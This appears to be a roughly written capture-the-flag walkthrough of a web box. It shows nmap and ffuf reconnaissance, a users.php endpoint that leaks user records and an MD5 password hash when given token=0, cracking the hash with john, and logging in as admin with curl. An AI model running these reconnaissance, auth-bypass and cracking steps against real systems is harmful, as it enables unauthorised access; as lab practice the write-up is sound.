Zorromegbia
This challenge focused on an web and sub directory. The vulnerability was explosed internal file, and the system with a writeable file and a CVE that use to PE
nmap
open-port
1
2
3
4
5
6
7
8
9
10
11
PORT STATE SERVICE VERSION
80/tcp open http syn-ack ttl 63 Apache httpd 2.4.67 ((Debian))
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
|_http-title: UniversityCTF 2026 Portal
|_http-server-header: Apache/2.4.67 (Debian)
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
HTTP(80)
Home page (index.php)
login page (login.php)
the page code is solid, it use PHP in the back-end and the login page has limited the login attempt and lock the IP of the user for 5 min.
FFUF
in this first is try fuzzing it normaly with the some rule but in need to -e it need file extinction in the flag and you find the files.
1
$ ffuf -u http://uni.ctf/FUZZ -w /usr/share/wordlists/seclists/Discovery/Web-Content/DirBuster-2007_directory-list-2.3-medium.txt -e .php,.html,.txt,.bak,.zip
The FUZZ show file and directory too
1
2
3
4
5
6
index.php
login.php
admin.php
includes
logout.php
.html
I foces on the incloudes folder it is not response in browser or curl but and i fuzz it and found
1
2
data.php
auth.php
this file look like the login tool file for login that have the password and the authenticater. try to look them up but i can not reach them like they are php so when i run them it executie not output any thing that have is a script that run inside.
foothold
i try many thinge to try to read the file
- LFI dose not work
?page=../../includes/auth.phpdont work after researching ai talk over i give all the info to the chatgpt and it find some thing i miss in the user.php token ``` curl -i http://192.168.1.8/users.php HTTP/1.1 400 Bad Request Date: Fri, 26 Jun 2026 20:11:11 GMT Server: Apache/2.4.67 (Debian) X-Powered-By: PHP/8.2.31 Content-Length: 42 Connection: close Content-Type: application/json; charset=utf-8
{ “error”: “missing token parameter” }
1
2
this show token need and i in that i add a token of all the and the token was 0
─$ curl -i “http://192.168.1.8/users.php?token=0” HTTP/1.1 200 OK Date: Fri, 26 Jun 2026 21:32:47 GMT Server: Apache/2.4.67 (Debian) X-Powered-By: PHP/8.2.31 Content-Length: 1567 Content-Type: application/json; charset=utf-8
[ { “id”: 2, “username”: “admin”, “email”: “admin@yekolotemari.com”, “password”: “56b32eb43e6f15395f6c46c1c9e1cd36”, “role”: “super user”, “token”: “8024b78f83f102da4f”, “name”: “Henok Girma”, “position”: “System Administrator”, “dob”: “1978-04-26”, “start_date”: “2021-01-12”, “salary”: “320800.00” }, …
1
now we have the admin credentials and the password in hash in md5,
└─$ john –format=Raw-MD5 –wordlist=/usr/share/wordlists/rockyou.txt hash Using default input encoding: UTF-8 Loaded 3 password hashes with no different salts (Raw-MD5 [MD5 256/256 AVX2 8x3]) Warning: no OpenMP support for this hash type, consider –fork=4 Press ‘q’ or Ctrl-C to abort, almost any other key for status wonderful1 (admin)
1g 0:00:00:00 DONE (2026-06-26 15:48) 1.219g/s 17491Kp/s 17491Kc/s 35004KC/s fuckyooh21..*7¡Vamos! Use the “–show –format=Raw-MD5” options to display all of the cracked passwords reliably Session completed.
1
login as Admin
curl -c cookies.txt -L -d ‘username=admin&password=wonderful1’ http://192.168.1.8/login.php ```



